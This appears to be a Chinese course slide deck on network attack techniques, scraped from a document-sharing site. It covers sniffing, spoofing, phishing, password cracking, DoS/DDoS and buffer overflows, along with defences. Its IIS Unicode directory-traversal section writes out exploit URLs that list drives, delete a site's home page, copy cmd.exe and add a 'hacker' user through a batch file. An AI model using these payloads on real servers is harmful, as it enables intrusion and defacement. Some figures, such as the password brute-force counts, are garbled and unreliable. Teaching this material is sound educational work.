




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
安全與支付第4講網(wǎng)絡(luò)攻擊技術(shù)網(wǎng)絡(luò)攻擊技術(shù)主要內(nèi)容網(wǎng)絡(luò)監(jiān)聽攻擊口令攻擊掃描攻擊欺騙攻擊漏洞利用攻擊拒絕服務(wù)攻擊監(jiān)聽攻擊網(wǎng)絡(luò)監(jiān)聽網(wǎng)絡(luò)監(jiān)聽指的是利用計(jì)算機(jī)的網(wǎng)絡(luò)接口捕獲網(wǎng)絡(luò)上傳輸?shù)哪康牡刂窞槠渌?jì)算機(jī)的數(shù)據(jù)報文。網(wǎng)絡(luò)監(jiān)聽工具也常稱作嗅探器,Snifferpro就是一個功能完善的網(wǎng)絡(luò)監(jiān)聽工具監(jiān)聽攻擊就是利用嗅探器來收集網(wǎng)絡(luò)上傳輸?shù)拿舾行畔⒄趥鬏數(shù)挠脩裘蛐庞每ㄌ?、密碼各種非共享機(jī)密數(shù)據(jù)通信主機(jī)的接口地址、TCP連接的字節(jié)順序號碼以太網(wǎng)監(jiān)聽原理在以太網(wǎng)局域網(wǎng)中一臺計(jì)算機(jī)與其他計(jì)算機(jī)進(jìn)行數(shù)據(jù)交換的時候,本局域網(wǎng)中的所有計(jì)算機(jī)都會收到數(shù)據(jù)包,但只有與數(shù)據(jù)包中目標(biāo)地址一致的那臺主機(jī)才會接收和處理數(shù)據(jù)包,其它的機(jī)器都會將包丟棄。但是,當(dāng)主機(jī)工作在監(jiān)聽模式下時,無論接收到的數(shù)據(jù)包中目標(biāo)地址是什么,主機(jī)都將其接收下來。然后對數(shù)據(jù)包進(jìn)行分析,就得到了局域網(wǎng)中通信的數(shù)據(jù)。嗅探器(Sniffer)就是將網(wǎng)卡設(shè)置為混雜模式,目的是使網(wǎng)絡(luò)接口處于監(jiān)聽狀態(tài),從而可接收網(wǎng)絡(luò)上傳輸?shù)拿恳粋€數(shù)據(jù)包。網(wǎng)絡(luò)監(jiān)聽常用Sniffer工具除了非常著名的監(jiān)聽軟件SnifferPro外,還有一些常用的監(jiān)聽軟件:Unix、Linux:Sniffit、TcpdumpWindows系統(tǒng):Iris、NetworkMonitor
免費(fèi)Ethereal:密碼監(jiān)聽工具WinSniffer:監(jiān)聽局域網(wǎng)內(nèi)密碼
pswmonitor:監(jiān)聽Web郵箱密碼、POP3郵箱密碼、Ftp登錄密碼等8如何發(fā)現(xiàn)和防范sniffer網(wǎng)絡(luò)通訊掉包率反常的高。網(wǎng)絡(luò)帶寬將出現(xiàn)異常。對于懷疑運(yùn)行監(jiān)聽程序的主機(jī),用正確的IP地址和錯誤的物理地址去PING,正常的機(jī)器不接受錯誤的物理地址,處于監(jiān)聽狀態(tài)的機(jī)器能接受,這種方法依賴系統(tǒng)的IPSTACK,對有些系統(tǒng)可能行不通。往網(wǎng)上發(fā)大量包含著不存在的物理地址的包,由于監(jiān)聽程序?qū)⑻幚磉@些包,將導(dǎo)致性能下降,通過比較前后該機(jī)器性能(icmpechodelay等方法)加以判斷9如何發(fā)現(xiàn)和防范sniffer2.對網(wǎng)絡(luò)監(jiān)聽的防范措施從邏輯或物理上對網(wǎng)絡(luò)分段
其目的是將非法用戶與敏感的網(wǎng)絡(luò)資源相互隔離,從而防止可能的非法監(jiān)聽。
以交換式集線器代替共享式集線器,使單播包僅在兩個節(jié)點(diǎn)之間傳送,從而防止非法監(jiān)聽。(3)使用加密技術(shù)
數(shù)據(jù)經(jīng)過加密后,通過監(jiān)聽仍然可以得到傳送的信息,但顯示的是亂碼。(4)劃分VLAN
運(yùn)用VLAN(虛擬局域網(wǎng))技術(shù),將以太網(wǎng)通信變?yōu)辄c(diǎn)到點(diǎn)通信,可以防止大部分基于網(wǎng)絡(luò)監(jiān)聽的入侵。
欺騙攻擊IP欺騙偽造他人的源IP地址,利用正常信任關(guān)系發(fā)動的攻擊ARP欺騙偽造IP地址和MAC地址的對應(yīng)關(guān)系DNS欺騙讓DNS服務(wù)器的緩存中存在錯誤的IP地址映射Web欺騙(釣魚攻擊)假冒的web站點(diǎn),騙取用戶的機(jī)密信息如04年10月發(fā)生的“網(wǎng)絡(luò)銀行”欺詐(網(wǎng)絡(luò)釣魚攻擊)IP欺騙攻擊IP欺騙攻擊13IP欺騙的防止(1)拋棄基于地址的信任策略(2)進(jìn)行包過濾(3)使用加密方法(4)使用隨機(jī)化的初始序列號DNS欺騙攻擊DNS欺騙攻擊DNS特性DNS對其本身無法解析的域名會自動向其他DNS服務(wù)器查詢?yōu)樘岣咝蔇NS會將查詢結(jié)果存入緩存DNS欺騙的基本思路讓DNS服務(wù)器的緩存中存有錯誤的IP地址映射攻擊者要做兩件事:偽造一個用戶的DNS請求偽造一個查詢應(yīng)答DNS欺騙攻擊網(wǎng)絡(luò)釣魚攻擊網(wǎng)絡(luò)釣魚(Phishing)一詞,是“Fishing”和“Phone”的綜合體,由于黑客始祖起初是以電話作案,所以用“Ph”來取代“F”,創(chuàng)造了”Phishing”攻擊者利用欺騙性的電子郵件和偽造的Web站點(diǎn)來進(jìn)行詐騙活動,誘騙訪問者提供一些個人信息,如信用卡號、賬戶和口令、社保編號等內(nèi)容(通常主要是那些和財(cái)務(wù),賬號有關(guān)的信息,以獲取不正當(dāng)利益),受騙者往往會泄露自己的機(jī)密數(shù)據(jù)網(wǎng)絡(luò)釣魚攻擊釣魚者入侵初級服務(wù)器,竊取用戶的名字和郵件地址釣魚者發(fā)送有針對性質(zhì)的郵件受害用戶訪問假冒網(wǎng)站受害用戶提供秘密,用戶信息被釣魚者取得釣魚者使用受害用戶的身份進(jìn)入其他網(wǎng)絡(luò)服務(wù)器如04年10月發(fā)生的“網(wǎng)絡(luò)銀行”欺詐(網(wǎng)絡(luò)釣魚攻擊)工行:—中國:—漏洞攻擊利用已發(fā)現(xiàn)的系統(tǒng)或應(yīng)用軟件實(shí)現(xiàn)上的漏洞攻擊系統(tǒng)操作系統(tǒng)或應(yīng)用軟件不可避免存在漏洞Windows3.1—300萬行代碼Windows2000—5000萬行代碼通過及時為系統(tǒng)安裝補(bǔ)丁程序,就可以消除系統(tǒng)漏洞。只要是針對漏洞進(jìn)行攻擊的案例都依賴于系統(tǒng)是否打了相關(guān)的補(bǔ)丁。漏洞攻擊實(shí)例:微軟IIS服務(wù)器的Unicode漏洞攻擊:
Unicode漏洞是2000-10-17發(fā)布的,受影響的版本:MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0
消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁,只要安裝了SP1以后,該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴(kuò)展UNICODE字符取代“/”和“\”,而能利用"../"目錄遍歷的漏洞漏洞攻擊Unicode漏洞的檢測方法:使用掃描工具來檢測Unicode漏洞是否存在,用前面介紹的X-Scan來對目標(biāo)系統(tǒng)進(jìn)行掃描,目標(biāo)主機(jī)IP為:09,Unicode漏洞屬于IIS漏洞,所以這里只掃描IIS漏洞就可以只要是/scripts開頭的漏洞都是Unicode漏洞。如下面的掃描結(jié)果,就顯示此服務(wù)器有Unicode漏洞/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\(HTTP:200)漏洞攻擊漏洞攻擊其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個有執(zhí)行程序權(quán)限的一個目錄,scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下,C:\Inetput\ScriptC:\Inetput\wwwroot在Windows的目錄結(jié)構(gòu)中,可以使用兩個點(diǎn)和一個斜線“../”來訪問上一級目錄,在瀏覽器中利用“scripts/../../”可以訪問到系統(tǒng)盤根目錄,訪問“scripts/../../winnt/system32”就訪問到系統(tǒng)的系統(tǒng)目錄了,在system32目錄下包含許多重要的系統(tǒng)文件,比如cmd.exe文件,可以利用該文件新建用戶,刪除文件等操作。漏洞攻擊瀏覽器地址欄中禁用符號“../”,但是可以使用符號“/”的Unicode的編碼。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語句是執(zhí)行dir命令列出目錄結(jié)構(gòu)。利用該漏洞讀取出計(jì)算機(jī)上目錄列表,比如讀取C盤的目錄,只要在瀏覽器中輸入“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\”得到如下結(jié)果:漏洞攻擊漏洞攻擊利用Unicode漏洞刪除主頁:利用Unicode可以方便的更改對方的主頁,比如現(xiàn)在已經(jīng)知道對方網(wǎng)站的根路徑在“C:\Initpub\wwwroot”(系統(tǒng)默認(rèn))下,可以刪除該路徑下的文件“default.asp”來刪除主頁,這里“default.asp”文件是IIS的默認(rèn)啟動頁面使用的語句是:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp漏洞攻擊利用Unicode漏洞拷貝文件:為了是使用方便,利用語句將cmd.exe文件拷貝到scripts目錄,并改名為c.exe,使用的語句是:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe程序執(zhí)行結(jié)果如圖所示。漏洞攻擊利用Unicode漏洞入侵系統(tǒng):在瀏覽器地址欄上執(zhí)行命令,用戶的權(quán)限比較低,像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode漏洞在對方系統(tǒng)建立管理員賬號可以通過下面一系列操作在對方主機(jī)創(chuàng)建一個有管理員權(quán)限的用戶36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+1234+/add+>c:\inetpub\scripts\hack.bat36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+/active:yes+>>c:\inetpub\scripts\hack.bat漏洞攻擊然后通過以下方式運(yùn)行hack.bat文件
36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\hack.bat
選擇打開,通過以上4步則在服務(wù)器上添加了一個管理員權(quán)限用戶hacker,密碼是1234口令攻擊口令攻擊是指把口令破解出來、獲取口令、或者讓口令保護(hù)失效。主要技術(shù):字典攻擊暴力攻擊其它方法嗅探分析木馬竊取社交欺騙口令攻擊字典攻擊攻擊者基于某些知識構(gòu)造口令字符串,生成口令字典,然后利用字典里的這些可能的字符串來測試密碼目的是縮小嘗試的范圍,高效快速的得到系統(tǒng)的密碼。一個字典文件本身就是一個標(biāo)準(zhǔn)的文本文件,其中的每一行就代表一個可能的密碼。口令攻擊口令字典的構(gòu)造方法口令攻擊暴力攻擊:通過窮舉的方法,使用所有可能口令的字符組合逐一測試,也稱窮舉攻擊。比如先從字母a嘗試,嘗試aa、ab、ac…然后再嘗試aaa、aab、aac…實(shí)例:利用軟件GetNTUser破解密碼,如圖:口令攻擊口令攻擊口令攻擊軟件口令攻擊口令攻擊軟件37設(shè)置安全的口令
在一個安全的口令里應(yīng)該包含大小寫字母、數(shù)字、標(biāo)點(diǎn)、空格、控制符等,另外口令越長,攻擊的難度越大。假設(shè)每秒鐘測試一百萬次,用小寫字母組成的4字符口令,窮舉攻擊需要的最大次數(shù)為26^4,窮舉搜索僅需要0.5秒;由所有可輸入字符構(gòu)成的4字符口令,則需要95^8次窮舉,搜索需要的時間為1.4分鐘,而8字符口令,則要95^8次窮舉,搜索需要的時間為210年。隨著硬件速度的不斷提高以及互聯(lián)網(wǎng)強(qiáng)大的分布計(jì)算能力,口令很難真正抵抗住窮舉攻擊的威脅。許多人設(shè)置口令時喜歡使用生日、名字、電話號碼、身份證號碼、地名、常用單詞等,這樣的口令固然便于記憶,但安全性極差。字典攻擊對于這樣的弱口令很奏效。38設(shè)置安全的口令口令的選擇:字母數(shù)字及標(biāo)點(diǎn)的組合,如:Ha,Pp@y!和w/(X,y)*;使用一句話的開頭字母做口令,如:由Afoxjumpsoveralazydog!產(chǎn)生口令A(yù)fJoAld!。口令的保存:記住、放到安全的地方,加密最好??诹畹氖褂茫狠斎肟诹畈灰寗e人看到;不要在不同的系統(tǒng)上使用同一口令;定期改變口令。39一次性口令(OTP,One-TimePassword)。一個口令僅使用一次,能有效地抵制重放攻擊OTP的主要思路是:在登錄過程中加入不確定因素,使每次登錄過程中的生成的口令不相同??诹盍斜?,每次登錄使用完一個口令后就將它從列表明中刪除;用戶也可以使用IC卡或其他的硬件卡來存儲用戶的秘密信息,這些信息再隨機(jī)數(shù)、系統(tǒng)時間等參數(shù)一起通過散列得到一個一次性口令。拒絕服務(wù)攻擊DoS--DenialofService:凡是能導(dǎo)致合法用戶不能夠訪問正常網(wǎng)絡(luò)服務(wù)的行為都是“拒絕服務(wù)攻擊”。DoS最主要的目的是:造成被攻擊服務(wù)器資源耗盡或系統(tǒng)崩潰而無法提供服務(wù)。服務(wù)本身無傷害;可使提供服務(wù)的信任度下降,影響公司的聲譽(yù)以及用戶對網(wǎng)絡(luò)服務(wù)的使用。常見的DoS攻擊:①帶寬攻擊:以極大的通信量沖擊網(wǎng)絡(luò),使網(wǎng)絡(luò)所有可用的帶寬都被消耗掉。②連通性攻擊:用大量的連接請求沖擊計(jì)算機(jī),最終導(dǎo)致計(jì)算機(jī)無法響應(yīng)和處理合法用戶的請求。單一的DoS攻擊一般是采用一對一的方式,當(dāng)攻擊的計(jì)算機(jī)CPU速度低、內(nèi)存小或網(wǎng)絡(luò)帶寬小等各項(xiàng)性能指標(biāo)不高時,效果是明顯的。DoS攻擊的分類以消耗目標(biāo)主機(jī)的可用資源為目的(例如:死亡之ping、SYN攻擊、Land攻擊、淚珠攻擊等)以消耗服務(wù)器鏈路的有效帶寬為目的(例如:蠕蟲)攻擊者
目標(biāo)主機(jī)SYNSYN/ACKACK等待應(yīng)答SYN:同步SYN/ACK:同步/確認(rèn)ACK:確認(rèn)SYN攻擊的原理(1)....SYN/ACKSYN/ACKSYN/ACKSYNSYNSYN攻擊者目標(biāo)主機(jī)SYNSYN/ACK1nSYN/ACKSYN/ACKSYN/ACKSYN/ACK....等待ACK應(yīng)答.........不應(yīng)答不應(yīng)答重新發(fā)送SYN攻擊的原理(2)以Windows為例SYN攻擊花費(fèi)時間(秒)累計(jì)花費(fèi)時間(秒)第一次,失敗33嘗試第1次,失敗69嘗試第2次,失敗1221嘗試第3次,失敗2445嘗試第4次,失敗4893嘗試第5次,失敗96189死亡之pingSYNFloodLand攻擊淚珠(Teardrop)攻擊
行行色色的DoS攻擊1)攻擊者攻擊諸客戶主機(jī)以求分析他們的安全水平和脆弱性。攻擊者各種客戶主機(jī)目標(biāo)系統(tǒng)2)攻擊者進(jìn)入其已經(jīng)發(fā)現(xiàn)的最弱的客戶主機(jī)之內(nèi)(“肉雞”),并且秘密地安置一個其可遠(yuǎn)程控制的代理程序(端口監(jiān)督程序demon)。攻擊準(zhǔn)備:安置代理代理程序DDoS(分布式拒絕服務(wù))攻擊(1)
3)攻擊者使他的全部代理程序同時發(fā)送由殘缺的數(shù)字包構(gòu)成的連接請求送至目標(biāo)系統(tǒng)。攻擊者目標(biāo)系統(tǒng)發(fā)起攻擊:指令攻擊的代理程序4)包括虛假的連接請求在內(nèi)的大量殘缺的數(shù)字包攻擊目標(biāo)系統(tǒng),最終將導(dǎo)致它因通信淤塞而崩潰。虛假的連接請求DDoS(分布式拒絕服務(wù))攻擊(2)DDoS和DoS小結(jié)DDoS的攻擊策略側(cè)重于通過很多“僵尸主機(jī)”(被攻擊者入侵過或可間接利用的主機(jī))向受害主機(jī)發(fā)送大量看似合法的網(wǎng)絡(luò)包,從而造成網(wǎng)絡(luò)阻塞或服務(wù)器資源耗盡而導(dǎo)致拒絕服務(wù),分布式拒絕服務(wù)攻擊一旦被實(shí)施,攻擊網(wǎng)絡(luò)包就會猶如洪水般涌向受害主機(jī),從而把合法用戶的網(wǎng)絡(luò)包淹沒,導(dǎo)致合法用戶無法正常訪問服務(wù)器的網(wǎng)絡(luò)資源,因此,拒絕服務(wù)攻擊又被稱之為“洪水式攻擊”,常見的DDoS攻擊手段有SYNFlood、ACKFlood、UDPFlood、ICMPFlood、TCPFlood、ConnectionsFlood、ScriptFlood、ProxyFlood等;DoS則側(cè)重于通過對主機(jī)特定漏洞的利用攻擊導(dǎo)致網(wǎng)絡(luò)棧失效、系統(tǒng)崩潰、主機(jī)死機(jī)而無法提供正常的網(wǎng)絡(luò)服務(wù)功能,從而造成拒絕服務(wù),常見的DoS攻擊手段有TearDrop、Land、Jolt、IGMPNuker、Boink、Smurf、Bonk、OOB等。緩沖區(qū)溢出(bufferoverflow)攻擊從一個對話框說起……認(rèn)識緩沖區(qū)溢出【引例】把1升的水注入容量為0.5升的容量中……第一次大規(guī)模的緩沖區(qū)溢出攻擊是發(fā)生在1988年的Morris蠕蟲,它造成了6000多臺機(jī)器被癱瘓,損失在$100000至$10000000之間,利用的攻擊方法之一就是fingerd的緩沖區(qū)溢出。緩沖區(qū)溢出攻擊已經(jīng)占了網(wǎng)絡(luò)攻擊的絕大多數(shù),據(jù)統(tǒng)計(jì),大約80%的安全事件與緩沖區(qū)溢出攻擊有關(guān)。流行的緩沖區(qū)溢出攻擊病毒(1)沖擊波
利用漏洞:RPC緩沖區(qū)溢出135/TCP(2)震蕩波
利用漏洞:LSASS漏洞1025/TCP(3)極速波
利用漏洞:UPNP漏洞445/TCP(4)高波
利用多種漏洞,非常危險惡意代碼攻擊病毒寄生、感染、
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024年全自動變焦照相機(jī)項(xiàng)目資金申請報告代可行性研究報告
- 2024年變頻器柜體系統(tǒng)項(xiàng)目資金籌措計(jì)劃書
- 2025年河南省三門峽市單招職業(yè)適應(yīng)性測試題庫匯編
- 2025年湖北省荊門市單招職業(yè)傾向性測試題庫匯編
- 2025年黑龍江商業(yè)職業(yè)學(xué)院單招職業(yè)適應(yīng)性測試題庫一套
- 兒童樂園裝修合同
- 2025年度安全培訓(xùn)與操作規(guī)范服務(wù)協(xié)議
- 2025年度員工勞動合同終止及生活困難補(bǔ)助協(xié)議
- 2025陜西省安全員C證考試(專職安全員)題庫附答案
- 2025年度房屋贈與及物業(yè)管理權(quán)轉(zhuǎn)移合同
- 德州環(huán)鋰新能源科技有限公司2萬噸年廢舊鋰電池回收項(xiàng)目環(huán)境影響報告書
- 2025年江蘇省中職《英語》學(xué)業(yè)水平考試核心考點(diǎn)試題庫500題(重點(diǎn))
- GB/T 1346-2024水泥標(biāo)準(zhǔn)稠度用水量、凝結(jié)時間與安定性檢驗(yàn)方法
- 2025年湖南中醫(yī)藥高等專科學(xué)校高職單招職業(yè)技能測試近5年??及鎱⒖碱}庫含答案解析
- 2025年江蘇信息職業(yè)技術(shù)學(xué)院高職單招職業(yè)適應(yīng)性測試近5年??及鎱⒖碱}庫含答案解析
- 【歷史】金與南宋對峙課件-2024-2025學(xué)年統(tǒng)編版七年級歷史下冊
- 2024年煙臺汽車工程職業(yè)學(xué)院高職單招職業(yè)適應(yīng)性測試歷年參考題庫含答案解析
- 2025年春新人教PEP版英語三年級下冊課件 Unit 1 Part C 第8課時 Reading time
- IIT臨床醫(yī)學(xué)項(xiàng)目管理
- 《消防檢查指導(dǎo)手冊》(2024版)
- 2024年萍鄉(xiāng)衛(wèi)生職業(yè)學(xué)院單招職業(yè)技能測試題庫標(biāo)準(zhǔn)卷
評論
0/150
提交評論